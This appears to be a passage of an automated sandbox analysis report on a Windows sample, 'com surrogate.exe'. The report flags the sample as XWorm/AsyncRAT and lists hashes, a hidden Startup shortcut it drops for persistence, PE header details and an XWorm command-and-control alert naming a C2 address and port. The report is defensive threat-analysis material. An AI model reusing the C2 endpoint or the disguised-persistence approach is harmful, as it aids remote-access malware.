                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):41
                                                                          Entropy (8bit):3.7195394315431693
                                                                          Encrypted:false
                                                                          SSDEEP:3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
                                                                          MD5:0DB526D48DAB0E640663E4DC0EFE82BA
                                                                          SHA1:17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
                                                                          SHA-256:934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
                                                                          SHA-512:FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
                                                                          Malicious:false
                                                                          Preview:....### explorer ###..[WIN]r[WIN]r[WIN]r

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dkhm5cs.stu.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ao2vxaxp.y3w.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_as4xt0ed.wdr.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bwssi3y3.fvp.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dtmszkdm.k1y.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fc1eduyc.zuz.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljjfrwah.ls2.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ly5j0s2n.ptr.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzjvgga0.vvx.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mi0fo5mk.tk5.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ndzv0p44.25e.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvd04zsm.qkj.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqwbfean.hoc.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qazmi1es.oc3.ps1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfibdbxn.flz.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdr1lmsz.cph.psm1

                                                                          Download File
                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostt.lnk

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\com surrogate.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Dec 16 06:37:36 2024, mtime=Mon Dec 16 06:37:36 2024, atime=Mon Dec 16 06:37:36 2024, length=60928, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):780
                                                                          Entropy (8bit):5.075175640087048
                                                                          Encrypted:false
                                                                          SSDEEP:12:8tzU2k4KWSVQNCmVeujAcml/IgUNwuLCM44t2YZ/elFlSJmZmV:8tBKF8RAcmBI7irqyFm
                                                                          MD5:87ADA73CC129D6C0CBE67A9DFC7BBEEA
                                                                          SHA1:FF0096364A8785F2888CFF2C3D9CD0AE4E6CB582
                                                                          SHA-256:9DDAF4CB05FC64DF46144462724D248BC7A15C5959C86D4A2D98160A1BBBF26C
                                                                          SHA-512:B5F2CDC282CC96F8578A664359B85F56427A15E209F1AB415287FD3EA5A6CD15B933C82DD91AEED700CEF9831E24B5ADC1B736C534AC02064521054238D01D05
                                                                          Malicious:false
                                                                          Preview:L..................F.... .....t`.O....`.O....t`.O............................:..DG..Yr?.D..U..k0.&...&......vk.v......t`.O....`.O......t.".CFSF..2......Y.< .svchostt.exe....t.Y^...H.g.3..(.....gVA.G..k...J......Y.<.Y.<....g.....................Ay..s.v.c.h.o.s.t.t...e.x.e...H...J...............-.......I...........).>b.....C:\Users\user\svchostt.exe..!.....\.....\.....\.....\.....\.....\.....\.s.v.c.h.o.s.t.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......035347...........hT..CrF.f4... .si.......,.......hT..CrF.f4... .si.......,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                                          C:\Users\user\svchostt.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\com surrogate.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):60928
                                                                          Entropy (8bit):5.797353062024812
                                                                          Encrypted:false
                                                                          SSDEEP:1536:JnF8QSNVQPMbRu7IKhl6F4IkO5bULqRKrn:JFpSNVnbRu7PhW4IkO5bUvn
                                                                          MD5:8843D79E5ECE984EF952051CB5B4F601
                                                                          SHA1:72BB266A7AAE0320F05276A0ED42753C2DC07F2B
                                                                          SHA-256:80D44BB082A49DD49BF5926EA31CA0C225725DAA4BA0614AE3EF1E121FDEF89C
                                                                          SHA-512:E19CB6C484F0415CD3CAB9E716A07CD5AE3662EE22B690310081C68AB73617DF8FA8236A98D72FBF5AE3B88EFEFE88E3C845EB42F0BF9B93963C628573C87BA1
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\svchostt.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\svchostt.exe, Author: Joe Security
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\svchostt.exe, Author: ditekSHen
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 82%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3J.g................................. ... ....@.. .......................`............@.................................`...K.... ..V....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...V.... ......................@..@.reloc.......@......................@..B........................H.......Pn..........&.....................................................(....*.r...p*. ..W.*..(....*.r...p*. B...*.s.........s.........s.........s.........*.r-..p*. .M^.*.rC..p*. .x!.*.rY..p*. ._..*.ro..p*. A...*.r...p*. ..w.*..((...*.r...p*. 72..*.r...p*. ....*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&(&...&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. q_b.*.r...p*. ;d..*.r...p*. ....*.r...p*. ..e.*.r%..p*. ...*.r;..p*. ~.H.*.rQ.

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):5.797353062024812
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:com surrogate.exe
                                                                          File size:60'928 bytes
                                                                          MD5:8843d79e5ece984ef952051cb5b4f601
                                                                          SHA1:72bb266a7aae0320f05276a0ed42753c2dc07f2b
                                                                          SHA256:80d44bb082a49dd49bf5926ea31ca0c225725daa4ba0614ae3ef1e121fdef89c
                                                                          SHA512:e19cb6c484f0415cd3cab9e716a07cd5ae3662ee22b690310081c68ab73617df8fa8236a98d72fbf5ae3b88efefe88e3c845eb42f0bf9b93963c628573c87ba1
                                                                          SSDEEP:1536:JnF8QSNVQPMbRu7IKhl6F4IkO5bULqRKrn:JFpSNVnbRu7PhW4IkO5bUvn
                                                                          TLSH:3B536C6CB7E44514D1FF9BF568B17212CB3ABA631C13D61F64D901CA1B27A8C8E40BE6
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3J.g................................. ... ....@.. .......................`............@................................

                                                                          File Icon

                                                                          Icon Hash:90cececece8e8eb0

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x4101ae
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x67084A33 [Thu Oct 10 21:42:11 2024 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                          Entrypoint Preview

                                                                          Instruction
                                                                          jmp dword ptr [00402000h]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al

                                                                          Data Directories

                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x101600x4b.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x656.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xc.reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                          Sections

                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x20000xe1b40xe20057c435be5e64ca183761c1d6f799b496False0.5482404590707964data5.903765401279519IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rsrc0x120000x6560x800abcac03fb4961514399b947f361fe84fFalse0.3505859375data3.59986308046374IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .reloc0x140000xc0x200f4a2e538b5107826b8a079f48616e9b6False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                          Resources

                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_VERSION0x120a00x3ccdata0.42592592592592593
                                                                          RT_MANIFEST0x1246c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                          Imports

                                                                          DLLImport
                                                                          mscoree.dll_CorExeMain

                                                                          Network Behavior

                                                                          Suricata IDS Alerts

                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-16T08:37:58.894044+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449791147.185.221.2248990TCP

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 16, 2024 08:36:26.620574951 CET4973080192.168.2.4208.95.112.1
